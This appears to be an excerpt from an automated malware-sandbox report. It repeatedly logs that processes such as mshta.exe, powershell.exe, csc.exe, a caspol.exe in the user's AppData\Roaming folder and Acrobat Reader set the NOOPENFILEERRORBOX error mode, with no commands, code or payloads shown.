Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
